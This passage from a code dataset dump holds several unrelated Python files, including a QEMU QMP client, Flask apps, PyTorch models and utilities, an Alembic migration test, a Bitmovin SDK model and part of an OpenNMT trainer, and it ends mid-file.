+\n \" '%s' not found\" % path)\n return\n\n def query(self, query, arguments={}):\n \"\"\"\n Execute query to socket\n \"\"\"\n if not self._connection:\n raise QMPError(\"Not connected\")\n q = {'execute': query}\n if arguments:\n q['arguments'] = arguments\n self._connection.send(json.dumps(q))\n self._connection.send(\"\\n\")\n retval = ''\n while True:\n t = self._connection.recv(1024)\n if len(t) > 2:\n retval = retval + t\n if \"\\n\" in retval:\n break\n else:\n break\n retval = json.loads(retval)\n if 'error' in retval:\n raise QMPError(retval['error'])\n return retval['return']\n\n def qmp_vminfo(self):\n try:\n retval = self.qmp_query('query-name')\n if retval:\n print(\"VM name:\\t\\t%s\" % retval['name'])\n except QMPError as e:\n logger.error(e)\n\n try:\n retval = self.qmp_query('query-uuid')\n if retval:\n print(\"UUID:\\t\\t\\t%s\" % retval['UUID'])\n except QMPError as e:\n logger.error(e)\n\n try:\n retval = self.qmp_query('query-status')\n if retval:\n a = ''\n if retval['singlestep']:\n a = \"(singlestep)\"\n print(\"running:\\t\\t%s %s\" % (retval['running'], a))\n except QMPError as e:\n logger.error(e)\n\n print(\"\")\n try:\n retval = self.qmp_query('query-kvm')\n if retval:\n if not retval['present']:\n print(\"KVM enabled:\\t\\t%s\" % retval['enabled'])\n print(\"KVM active:\\t\\t%s\" % retval['present'])\n\n except QMPError as e:\n logger.error(e)\n\n\n\n print(\"\\nCPU:\\t\\t\\tthread id\")\n try:\n retval = self.qmp_query('query-cpus')\n if retval:\n for cpu in retval:\n if cpu['halted']:\n print(\" CPU%(CPU)s (halted):\\t\\t%(thread_id)s\" % cpu)\n else:\n print(\" CPU%(CPU)s:\\t\\t\\t%(thread_id)s\" % cpu)\n\n except QMPError as e:\n logger.error(e)\n\n print(\"\\nBlock devices:\")\n try:\n retval = self.qmp_query('query-block')\n if retval:\n for device in retval:\n d = {\n 'readonly' : False,\n 'drv' : None,\n 'encrypted': False,\n 'filename' : None,\n 'device' : None,\n 'locked' : False,\n \"removable\" : False,\n \"type\" : None\n }\n # {\"device\": \"virtio0\", \"locked\": false, \"removable\": false,\n # \"inserted\": {\"ro\": false, \"drv\": \"raw\", \"encrypted\": false, \"file\": \"/home/virtuals/images/dynamiitti_1.img\"},\n # \"type\": \"hd\"}\n if 'inserted' in device:\n if \"ro\" in device['inserted']:\n d['readonly'] = device['inserted'][\"ro\"]\n if \"drv\" in device['inserted']:\n d['drv'] = device['inserted'][\"drv\"]\n if \"encrypted\" in device['inserted']:\n d['encrypted'] = device['inserted'][\"encrypted\"]\n if \"file\" in device['inserted']:\n d['filename'] = device['inserted'][\"file\"]\n if 'device' in device:\n d['device'] = device['device']\n if 'type' in device:\n d['type'] = device['type']\n if 'locked' in device:\n d['locked'] = device['locked']\n if 'removable' in device:\n d['removable'] = device['removable']\n opts = []\n if d['removable']:\n opts.append('removable')\n if d['locked']:\n opts.append('locked')\n if d['readonly']:\n opts.append('readonly')\n if d['encrypted']:\n opts.append('encrypted')\n d['opts'] = ','.join(opts)\n print(\" Device %(type)s\\t\\t%(device)s (%(opts)s)\" % d)\n if d['filename']:\n print(\" file:\\t\\t\\t%(filename)s\" % d)\n print(\"\")\n except QMPError as e:\n logger.error(e)\n","sub_path":"km/qmp.py","file_name":"qmp.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"540724666","text":"from flask import Flask, render_template\n\napp = Flask(__name__)\n\nposts = [\n {\n 'author': 'John Doe',\n 'title': 'Sample Blog Post',\n 'content': 'This is the post.',\n 'date_posted': 'January 21, 2021'\n }, {\n 'author': 'Bob Sanders',\n 'title': 'Alternate Post',\n 'content': 'Hello universe.',\n 'date_posted': 'March 7th, 2018'\n }\n]\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html', posts=posts)\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"444408953","text":"import torch\nfrom torch import optim\nfrom torch import nn\n\n\ndef get_optim(params, target):\n\n assert isinstance(target, nn.Module) or isinstance(target, dict)\n\n if isinstance(target, nn.Module):\n target = target.parameters()\n\n if params['optimizer'] == 'sgd':\n optimizer = optim.SGD(target, params['lr'], weight_decay=params['wd'])\n elif params['optimizer'] == 'momentum':\n optimizer = optim.SGD(\n target, params['lr'], momentum=0.9, weight_decay=params['wd'])\n elif params['optimizer'] == 'nesterov':\n optimizer = optim.SGD(target, params['lr'], momentum=0.9,\n weight_decay=params['wd'], nesterov=True)\n elif params['optimizer'] == 'adam':\n optimizer = optim.Adam(target, params['lr'], weight_decay=params['wd'])\n elif params['optimizer'] == 'amsgrad':\n optimizer = optim.Adam(\n target, params['lr'], weight_decay=params['wd'], amsgrad=True)\n elif params['optimizer'] == 'rmsprop':\n optimizer = optim.RMSprop(target, params['lr'], weight_decay=params['wd'])\n else:\n raise ValueError\n\n return optimizer\n\n\ndef denorm(x):\n out = (x + 1) / 2\n return out.clamp(0, 1)\n","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"252410398","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_marshmallow import Marshmallow\nfrom marshmallow.exceptions import ValidationError\nfrom .configs import Config\n\n\ndb = SQLAlchemy()\nmigrate = Migrate()\n\nma = Marshmallow()\n\n\ndef register_blueprint(app):\n from .endpoints import blueprint as pedidos\n\n app.register_blueprint(pedidos)\n\ndef register_error_handlers(app):\n @app.errorhandler(ValidationError)\n def validation_error_handler(e):\n return e.massages,400\n \ndef create_app():\n app = Flask(__name__)\n app.config.from_object(Config)\n\n register_blueprint(app)\n register_error_handlers(app)\n db.init_app(app)\n migrate.init_app(app, db)\n ma.init_app(app)\n\n return app\n","sub_path":"pedidos/src/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"369669388","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport alembic\nfrom oslo_serialization import jsonutils\nimport sqlalchemy as sa\n\nfrom nailgun.db import db\nfrom nailgun.db import dropdb\nfrom nailgun.db.migration import ALEMBIC_CONFIG\nfrom nailgun.test import base\n\n_prepare_revision = '675105097a69'\n_test_revision = 'c6edea552f1e'\n\nJSON_TASKS = [\n {\n 'id': 'post_deployment_end',\n 'type': 'stage',\n 'requires': ['post_deployment_start']\n },\n {\n 'id': 'primary-controller',\n 'parameters': {'strategy': {'type': 'one_by_one'}},\n 'required_for': ['deploy_end'],\n 'requires': ['deploy_start'],\n 'role': ['primary-controller'], # legacy notation should be converted\n # to `roles`\n 'type': 'group'\n },\n {\n 'id': 'cross-dep-test',\n 'type': 'puppet',\n 'cross-depended-by': ['a', 'b'],\n 'cross-depends': ['c', 'd']\n },\n {\n 'id': 'custom-test',\n 'type': 'puppet',\n 'test_pre': {'k': 'v'},\n 'test_post': {'k': 'v'}\n }\n]\n\n\ndef setup_module():\n dropdb()\n alembic.command.upgrade(ALEMBIC_CONFIG, _prepare_revision)\n prepare()\n alembic.command.upgrade(ALEMBIC_CONFIG, _test_revision)\n\n\ndef prepare():\n meta = base.reflect_db_metadata()\n\n result = db.execute(\n meta.tables['releases'].insert(),\n [{\n 'name': 'test_name',\n 'version': '2015.1-8.0',\n 'operating_system': 'ubuntu',\n 'state': 'available',\n }])\n release_id = result.inserted_primary_key[0]\n\n cluster_ids = []\n for cluster_name in ['test_env1', 'test_env2']:\n result = db.execute(\n meta.tables['clusters'].insert(),\n [{\n 'name': cluster_name,\n 'release_id': release_id,\n 'mode': 'ha_compact',\n 'status': 'new',\n 'net_provider': 'neutron',\n 'grouping': 'roles',\n 'fuel_version': '10.0'\n }])\n cluster_ids.append(result.inserted_primary_key[0])\n\n result = db.execute(\n meta.tables['plugins'].insert(),\n [{\n 'name': 'test_plugin_a',\n 'title': 'Test plugin A',\n 'version': '2.0.0',\n 'description': 'Test plugin A for Fuel',\n 'homepage': 'http://fuel_plugins.test_plugin.com',\n 'package_version': '4.0.0',\n 'groups': jsonutils.dumps(['tgroup']),\n 'authors': jsonutils.dumps(['tauthor']),\n 'licenses': jsonutils.dumps(['tlicense']),\n 'releases': jsonutils.dumps([\n {'repository_path': 'repositories/ubuntu'}\n ]),\n 'deployment_tasks': jsonutils.dumps(JSON_TASKS),\n 'fuel_version': jsonutils.dumps(['8.0']),\n 'network_roles_metadata': jsonutils.dumps([{\n 'id': 'admin/vip',\n 'default_mapping': 'fuelweb_admin',\n 'properties': {\n 'subnet': True,\n 'gateway': False,\n 'vip': [\n {\n 'name': 'my-vip1',\n 'namespace': 'my-namespace1',\n },\n {\n 'name': 'my-vip2',\n 'namespace': 'my-namespace2',\n }\n ]\n }\n }])\n }]\n )\n plugin_a_id = result.inserted_primary_key[0]\n\n result = db.execute(\n meta.tables['plugins'].insert(),\n [{\n 'name': 'test_plugin_b',\n 'title': 'Test plugin B',\n 'version': '2.0.0',\n 'description': 'Test plugin B for Fuel',\n 'homepage': 'http://fuel_plugins.test_plugin.com',\n 'package_version': '4.0.0',\n 'groups': jsonutils.dumps(['tgroup']),\n 'authors': jsonutils.dumps(['tauthor']),\n 'licenses': jsonutils.dumps(['tlicense']),\n 'releases': jsonutils.dumps([\n {'repository_path': 'repositories/ubuntu'}\n ]),\n 'fuel_version': jsonutils.dumps(['8.0']),\n 'network_roles_metadata': jsonutils.dumps([{\n 'id': 'admin/vip',\n 'default_mapping': 'fuelweb_admin',\n 'properties': {\n 'subnet': True,\n 'gateway': False,\n 'vip': [\n {\n 'name': 'my-vip3',\n 'namespace': 'my-namespace3',\n },\n {\n 'name': 'my-vip4',\n 'namespace': 'my-namespace4',\n }\n ]\n }\n }])\n }]\n )\n plugin_b_id = result.inserted_primary_key[0]\n\n db.execute(\n meta.tables['cluster_plugin_links'].insert(),\n [\n {\n 'cluster_id': cluster_ids[0],\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description',\n 'hidden': False\n },\n # this is duplicate, should be deleted during migration\n {\n 'cluster_id': cluster_ids[1],\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description_duplicate',\n 'hidden': False\n },\n # duplicate by URL but in another cluster, should\n # not be deleted\n {\n 'cluster_id': cluster_ids[0],\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description',\n 'hidden': False\n }\n ]\n )\n\n db.execute(\n meta.tables['plugin_links'].insert(),\n [\n {\n 'plugin_id': plugin_a_id,\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description',\n 'hidden': False\n },\n # this is duplicate, should be deleted during migration\n {\n 'plugin_id': plugin_b_id,\n 'title': 'title',\n 'url': 'http://www.zzz.com',\n 'description': 'description_duplicate',\n 'hidden': False\n }\n ]\n )\n\n db.commit()\n\n\nclass TestPluginLinksConstraints(base.BaseAlembicMigrationTest):\n # see initial data in setup section\n def test_plugin_links_duplicate_cleanup(self):\n links_count = db.execute(\n sa.select(\n [sa.func.count(self.meta.tables['plugin_links'].c.id)]\n )).fetchone()[0]\n self.assertEqual(links_count, 1)\n\n def test_cluster_plugin_links_duplicate_cleanup(self):\n links_count = db.execute(\n sa.select(\n [sa.func.count(self.meta.tables['cluster_plugin_links'].c.id)]\n )).fetchone()[0]\n self.assertEqual(links_count, 2)\n","sub_path":"nailgun/nailgun/test/unit/test_migration_fuel_10_0.py","file_name":"test_migration_fuel_10_0.py","file_ext":"py","file_size_in_byte":7733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"520049542","text":"class Solution:\n def reverseWords(self, s):\n s.reverse()\n s.append(' ')\n start = 0\n for i in range(len(s)):\n if s[i] == ' ':\n s[start:i] = reversed(s[start:i])\n start = i + 1\n s.pop()\n","sub_path":"186/186.reverse-words-in-a-string-ii.270738852.Accepted.leetcode.py","file_name":"186.reverse-words-in-a-string-ii.270738852.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"58591767","text":"import torch\nimport torch.nn as nn\n\nclass SEBlock(nn.Module):\n\n def __init__(self,planes):\n super(SEBlock,self).__init__()\n self.avgpool = nn.AdaptiveAvgPool1d(1)\n self.maxpool = nn.AdaptiveMaxPool1d(1)\n self.fc1 = nn.Conv1d(planes, planes//8, kernel_size=1)\n self.fc2 = nn.Conv1d(planes//8, planes, kernel_size=1)\n self.relu = nn.ReLU(True)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self,x):\n avgtmp = self.avgpool(x)\n maxtmp = self.maxpool(x)\n tmp = avgtmp + maxtmp\n tmp = self.fc1(tmp)\n tmp = self.relu(tmp)\n tmp = self.fc2(tmp)\n tmp = self.sigmoid(tmp)\n return x * tmp\n\nclass CAMBlock(nn.Module):\n\n def __init__(self):\n super(CAMBlock,self).__init__()\n self.maxpool = nn.AdaptiveMaxPool1d(1)\n self.avgpool = nn.AdaptiveAvgPool1d(1)\n self.conv = nn.Conv1d(2, 1, 7, padding = 3)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self,x):\n x_tmp = x.permute([0,2,1])\n maxpool_output = self.maxpool(x_tmp)\n avgpool_output = self.avgpool(x_tmp)\n x_tmp = torch.cat([maxpool_output,avgpool_output],dim = -1)\n x_tmp = x_tmp.permute([0,2,1])\n x_tmp = self.sigmoid(self.conv(x_tmp))\n return x * x_tmp\n\n\nclass CNNBlock(nn.Module):\n\n def __init__(self,in_channel,out_channel):\n super(CNNBlock,self).__init__()\n self.convt = nn.Conv1d(in_channel,out_channel,1,stride=2)\n self.conv1 = nn.Conv1d(in_channel,out_channel,3,padding = 1)\n self.conv2 = nn.Conv1d(out_channel,out_channel,3,padding = 1)\n self.conv3 = nn.Conv1d(out_channel,out_channel,25,2,padding = 12)\n self.bn1 = nn.BatchNorm1d(in_channel)\n self.bn2 = nn.BatchNorm1d(out_channel)\n self.bn3 = nn.BatchNorm1d(out_channel)\n self.se = SEBlock(out_channel)\n self.cam = CAMBlock()\n self.relu = nn.ReLU(True)\n self.dropout = nn.Dropout(0.2)\n\n def forward(self,x):\n shortcut = self.convt(x)\n x = self.bn1(x)\n x = self.conv1(x)\n x = self.relu(x)\n x = self.bn2(x)\n x = self.conv2(x)\n x = self.relu(x)\n x = self.bn3(x)\n x = self.conv3(x)\n x += shortcut\n x = self.relu(x)\n x = self.se(x)\n x = self.cam(x)\n x = self.dropout(x)\n \n return x\n\nclass CNN(nn.Module):\n\n def __init__(self):\n super(CNN,self).__init__()\n self.conv1 = CNNBlock(1, 64)\n self.conv2 = CNNBlock(64, 128)\n self.conv3 = CNNBlock(128, 128)\n self.conv4 = CNNBlock(128, 128)\n self.conv5 = CNNBlock(128, 128)\n self.gru = nn.GRU(128, 128,batch_first=True,bidirectional=True)\n self.relu = nn.ReLU(True)\n self.linear_unit = nn.Sequential(\n nn.Linear(256, 128),\n nn.ReLU(True),\n nn.Dropout(0.1),\n nn.Linear(128, 64),\n nn.ReLU(True),\n nn.Dropout(0.1),\n nn.Linear(64, 2),\n nn.Softmax(-1)\n )\n\n def forward(self,x):\n batch_size = x.size(0)\n x = x.view(-1,1,1000)\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = x.permute([0,2,1])\n _,h = self.gru(x)\n h = self.relu(h.permute([1,0,2]))\n x = h.reshape(h.size(0),-1)\n x = self.linear_unit(x)\n return x\n\nclass RNN(nn.Module):\n\n def __init__(self):\n super(RNN,self).__init__()\n self.gru1 = nn.GRU(512, 128,batch_first=True,bidirectional=True)\n self.relu = nn.ReLU(False)\n self.dropout = nn.Dropout(0.2)\n self.linear1 = nn.Linear(256,128)\n self.linear2 = nn.Linear(128,2)\n self.softmax = nn.Softmax(-1)\n\n def forward(self,x):\n x,h = self.gru1(x)\n x = self.relu(x)\n x = self.relu(self.linear1(x))\n x = self.dropout(x)\n x = self.softmax(self.linear2(x))\n return x\n\n\n\nif __name__ == '__main__':\n model = CNN()\n x = torch.rand(128,1000)\n y = model(x)\n print(y.size())\n # model = RNN()\n # x = torch.rand(24,30,512)\n # y = model(x)\n # print(y.size())","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"218204039","text":"# coding: utf-8\n\nfrom enum import Enum\nfrom six import string_types, iteritems\nfrom bitmovin_api_sdk.common.poscheck import poscheck_model\nfrom bitmovin_api_sdk.models.dolby_digital_plus_surround_mode import DolbyDigitalPlusSurroundMode\nimport pprint\nimport six\n\n\nclass DolbyDigitalPlusBitstreamInfo(object):\n @poscheck_model\n def __init__(self,\n surround_mode=None,\n surround_ex_mode=None):\n # type: (DolbyDigitalPlusSurroundMode, DolbyDigitalPlusSurroundMode) -> None\n\n self._surround_mode = None\n self._surround_ex_mode = None\n self.discriminator = None\n\n if surround_mode is not None:\n self.surround_mode = surround_mode\n if surround_ex_mode is not None:\n self.surround_ex_mode = surround_ex_mode\n\n @property\n def openapi_types(self):\n types = {\n 'surround_mode': 'DolbyDigitalPlusSurroundMode',\n 'surround_ex_mode': 'DolbyDigitalPlusSurroundMode'\n }\n\n return types\n\n @property\n def attribute_map(self):\n attributes = {\n 'surround_mode': 'surroundMode',\n 'surround_ex_mode': 'surroundExMode'\n }\n return attributes\n\n @property\n def surround_mode(self):\n # type: () -> DolbyDigitalPlusSurroundMode\n \"\"\"Gets the surround_mode of this DolbyDigitalPlusBitstreamInfo.\n\n This parameter indicates to a decoder whether the two‐channel encoded bitstream contains a Dolby Surround (Lt/Rt) program that requires Dolby Pro Logic decoding. When downmixing to stereo from a multichannel input, set this value according to the type of downmix performed (Lt/Rt: `ENABLED`, Lo/Ro: `DISABLED`). When transcoding a stereo Dolby Digital, Dolby Digital Plus, or Dolby E input, the value must be passed through from the input bitstream to the output bitstream. When transcoding a third-party stereo input to stereo Dolby Digital set the value to `NOT_INDICATED`. \n\n :return: The surround_mode of this DolbyDigitalPlusBitstreamInfo.\n :rtype: DolbyDigitalPlusSurroundMode\n \"\"\"\n return self._surround_mode\n\n @surround_mode.setter\n def surround_mode(self, surround_mode):\n # type: (DolbyDigitalPlusSurroundMode) -> None\n \"\"\"Sets the surround_mode of this DolbyDigitalPlusBitstreamInfo.\n\n This parameter indicates to a decoder whether the two‐channel encoded bitstream contains a Dolby Surround (Lt/Rt) program that requires Dolby Pro Logic decoding. When downmixing to stereo from a multichannel input, set this value according to the type of downmix performed (Lt/Rt: `ENABLED`, Lo/Ro: `DISABLED`). When transcoding a stereo Dolby Digital, Dolby Digital Plus, or Dolby E input, the value must be passed through from the input bitstream to the output bitstream. When transcoding a third-party stereo input to stereo Dolby Digital set the value to `NOT_INDICATED`. \n\n :param surround_mode: The surround_mode of this DolbyDigitalPlusBitstreamInfo.\n :type: DolbyDigitalPlusSurroundMode\n \"\"\"\n\n if surround_mode is not None:\n if not isinstance(surround_mode, DolbyDigitalPlusSurroundMode):\n raise TypeError(\"Invalid type for `surround_mode`, type has to be `DolbyDigitalPlusSurroundMode`\")\n\n self._surround_mode = surround_mode\n\n @property\n def surround_ex_mode(self):\n # type: () -> DolbyDigitalPlusSurroundMode\n \"\"\"Gets the surround_ex_mode of this DolbyDigitalPlusBitstreamInfo.\n\n This is used to identify the encoded audio as material encoded in Dolby Digital Surround EX. This parameter is used only if the encoded audio has two surround channels. An amplifier or receiver with Dolby Digital Surround EX decoding can use this parameter as a flag to switch the decoding on or off automatically. The behavior is similar to that of the `surroundMode` parameter. \n\n :return: The surround_ex_mode of this DolbyDigitalPlusBitstreamInfo.\n :rtype: DolbyDigitalPlusSurroundMode\n \"\"\"\n return self._surround_ex_mode\n\n @surround_ex_mode.setter\n def surround_ex_mode(self, surround_ex_mode):\n # type: (DolbyDigitalPlusSurroundMode) -> None\n \"\"\"Sets the surround_ex_mode of this DolbyDigitalPlusBitstreamInfo.\n\n This is used to identify the encoded audio as material encoded in Dolby Digital Surround EX. This parameter is used only if the encoded audio has two surround channels. An amplifier or receiver with Dolby Digital Surround EX decoding can use this parameter as a flag to switch the decoding on or off automatically. The behavior is similar to that of the `surroundMode` parameter. \n\n :param surround_ex_mode: The surround_ex_mode of this DolbyDigitalPlusBitstreamInfo.\n :type: DolbyDigitalPlusSurroundMode\n \"\"\"\n\n if surround_ex_mode is not None:\n if not isinstance(surround_ex_mode, DolbyDigitalPlusSurroundMode):\n raise TypeError(\"Invalid type for `surround_ex_mode`, type has to be `DolbyDigitalPlusSurroundMode`\")\n\n self._surround_ex_mode = surround_ex_mode\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if value is None:\n continue\n if isinstance(value, list):\n if len(value) == 0:\n continue\n result[self.attribute_map.get(attr)] = [y.value if isinstance(y, Enum) else y for y in [x.to_dict() if hasattr(x, \"to_dict\") else x for x in value]]\n elif hasattr(value, \"to_dict\"):\n result[self.attribute_map.get(attr)] = value.to_dict()\n elif isinstance(value, Enum):\n result[self.attribute_map.get(attr)] = value.value\n elif isinstance(value, dict):\n result[self.attribute_map.get(attr)] = {k: (v.to_dict() if hasattr(v, \"to_dict\") else v) for (k, v) in value.items()}\n else:\n result[self.attribute_map.get(attr)] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DolbyDigitalPlusBitstreamInfo):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bitmovin_api_sdk/models/dolby_digital_plus_bitstream_info.py","file_name":"dolby_digital_plus_bitstream_info.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"294389751","text":"from xai.python.file import File\nimport json\n\nclass Eye():\n '''\n '''\n def __init__(self, filename=None):\n self.filename = filename\n pass\n\n #\n def read_json(self, filename):\n '''\n '''\n if filename:\n self.filename = filename\n with open(self.filename) as file:\n jsondata = json.load(file)\n file.close()\n return jsondata\n #\n def read_sent(self, filename):\n '''\n '''\n if filename:\n self.filename = filename\n with open(self.filename) as file:\n sents = file.readlines()\n file.close()\n return sents\n\n# Run main function by default\nif __name__ == \"__main__\":\n file = File()\n eye = Eye()\n #==================================================================\n # jsondata\n filename = file.pwd + '/xai/words/jsonword/test.dat'\n jsondata = eye.read_sent(filename)\n print(jsondata)\n #==================================================================\n # sent\n filename = file.pwd + '/xai/sents/test.dat'\n sents = eye.read_sent(filename)\n print(sents)","sub_path":"xai/body/eye.py","file_name":"eye.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"574747445","text":"\"\"\"\n This is the loadable seq2seq trainer library that is\n in charge of training details, loss compute, and statistics.\n See train.py for a use case of this library.\n\n Note: To make this a general library, we implement *only*\n mechanism things here(i.e. what to do), and leave the strategy\n things to users(i.e. how to do it). Also see train.py(one of the\n users of this library) for the strategy things we do.\n\"\"\"\n\nimport torch\nimport traceback\n\nimport onmt.utils\nfrom onmt.utils.logging import logger\n\ntorch.autograd.set_detect_anomaly(True)\n\n\ndef build_trainer(opt, device_id, model, fields, optim, model_saver=None):\n \"\"\"\n Simplify `Trainer` creation based on user `opt`s*\n\n Args:\n opt (:obj:`Namespace`): user options (usually from argument parsing)\n model (:obj:`onmt.models.NMTModel`): the model to train\n fields (dict): dict of fields\n optim (:obj:`onmt.utils.Optimizer`): optimizer used during training\n data_type (str): string describing the type of data\n e.g. \"text\", \"img\", \"audio\"\n model_saver(:obj:`onmt.models.ModelSaverBase`): the utility object\n used to save the model\n \"\"\"\n\n tgt_field = dict(fields)[\"tgt\"].base_field\n train_loss = onmt.utils.loss.build_loss_compute(model, tgt_field, opt)\n valid_loss = onmt.utils.loss.build_loss_compute(\n model, tgt_field, opt, train=False)\n\n trunc_size = opt.truncated_decoder # Badly named...\n shard_size = opt.max_generator_batches if opt.model_dtype == 'fp32' else 0\n norm_method = opt.normalization\n accum_count = opt.accum_count\n accum_steps = opt.accum_steps\n n_gpu = opt.world_size\n average_decay = opt.average_decay\n average_every = opt.average_every\n dropout = opt.dropout\n dropout_steps = opt.dropout_steps\n if device_id >= 0:\n gpu_rank = opt.gpu_ranks[device_id]\n else:\n gpu_rank = 0\n n_gpu = 0\n gpu_verbose_level = opt.gpu_verbose_level\n\n earlystopper = onmt.utils.EarlyStopping(\n opt.early_stopping, scorers=onmt.utils.scorers_from_opts(opt)) \\\n if opt.early_stopping > 0 else None\n\n source_noise = None\n if len(opt.src_noise) > 0:\n src_field = dict(fields)[\"src\"].base_field\n corpus_id_field = dict(fields).get(\"corpus_id\", None)\n if corpus_id_field is not None:\n ids_to_noise = corpus_id_field.numericalize(opt.data_to_noise)\n else:\n ids_to_noise = None\n source_noise = onmt.modules.source_noise.MultiNoise(\n opt.src_noise,\n opt.src_noise_prob,\n ids_to_noise=ids_to_noise,\n pad_idx=src_field.pad_token,\n end_of_sentence_mask=src_field.end_of_sentence_mask,\n word_start_mask=src_field.word_start_mask,\n device_id=device_id\n )\n\n report_manager = onmt.utils.build_report_manager(opt, gpu_rank)\n trainer = onmt.Trainer(model, train_loss, valid_loss, optim, trunc_size,\n shard_size, norm_method,\n accum_count, accum_steps,\n n_gpu, gpu_rank,\n gpu_verbose_level, report_manager,\n with_align=True if opt.lambda_align > 0 else False,\n model_saver=model_saver if gpu_rank == 0 else None,\n average_decay=average_decay,\n average_every=average_every,\n model_dtype=opt.model_dtype,\n earlystopper=earlystopper,\n dropout=dropout,\n dropout_steps=dropout_steps,\n source_noise=source_noise,\n num_experts=opt.num_experts,\n learned_prior=opt.learned_prior,\n sampling_z=opt.sampling_z,\n soft_selection=opt.soft_selection,\n weighted_grad=opt.weighted_grad,\n vocab=tgt_field.vocab)\n return trainer\n\n\nclass Trainer(object):\n \"\"\"\n Class that controls the training process.\n\n Args:\n model(:py:class:`onmt.models.model.NMTModel`): translation model\n to train\n train_loss(:obj:`onmt.utils.loss.LossComputeBase`):\n training loss computation\n valid_loss(:obj:`onmt.utils.loss.LossComputeBase`):\n training loss computation\n optim(:obj:`onmt.utils.optimizers.Optimizer`):\n the optimizer responsible for update\n trunc_size(int): length of truncated back propagation through time\n shard_size(int): compute loss in shards of this size for efficiency\n data_type(string): type of the source input: [text|img|audio]\n norm_method(string): normalization methods: [sents|tokens]\n accum_count(list): accumulate gradients this many times.\n accum_steps(list): steps for accum gradients changes.\n report_manager(:obj:`onmt.utils.ReportMgrBase`):\n the object that creates reports, or None\n model_saver(:obj:`onmt.models.ModelSaverBase`): the saver is\n used to save a checkpoint.\n Thus nothing will be saved if this parameter is None\n \"\"\"\n\n def __init__(self, model, train_loss, valid_loss, optim,\n trunc_size=0, shard_size=32,\n norm_method=\"sents\", accum_count=[1],\n accum_steps=[0],\n n_gpu=1, gpu_rank=1, gpu_verbose_level=0,\n report_manager=None, with_align=False, model_saver=None,\n average_decay=0, average_every=1, model_dtype='fp32',\n earlystopper=None, dropout=[0.3], dropout_steps=[0],\n source_noise=None, num_experts=1, learned_prior=False, \n sampling_z=False, soft_selection=False, weighted_grad=False, \n vocab=None):\n # Basic attributes.\n self.model = model\n self.train_loss = train_loss\n self.valid_loss = valid_loss\n self.optim = optim\n self.trunc_size = trunc_size\n self.shard_size = shard_size\n self.norm_method = norm_method\n self.accum_count_l = accum_count\n self.accum_count = accum_count[0]\n self.accum_steps = accum_steps\n self.n_gpu = n_gpu\n self.gpu_rank = gpu_rank\n self.gpu_verbose_level = gpu_verbose_level\n self.report_manager = report_manager\n self.with_align = with_align\n self.model_saver = model_saver\n self.average_decay = average_decay\n self.moving_average = None\n self.average_every = average_every\n self.model_dtype = model_dtype\n self.earlystopper = earlystopper\n self.dropout = dropout\n self.dropout_steps = dropout_steps\n self.source_noise = source_noise\n self.num_experts = num_experts\n self.learned_prior = learned_prior\n self.sampling_z = sampling_z\n self.soft_selection = soft_selection\n self.weighted_grad = weighted_grad\n self.vocab = vocab\n\n for i in range(len(self.accum_count_l)):\n assert self.accum_count_l[i] > 0\n if self.accum_count_l[i] > 1:\n assert self.trunc_size == 0, \\\n \"\"\"To enable accumulated gradients,\n you must disable target sequence truncating.\"\"\"\n\n # Set model in training mode.\n self.model.train()\n\n def _accum_count(self, step):\n for i in range(len(self.accum_steps)):\n if step > self.accum_steps[i]:\n _accum = self.accum_count_l[i]\n return _accum\n\n def _maybe_update_dropout(self, step):\n 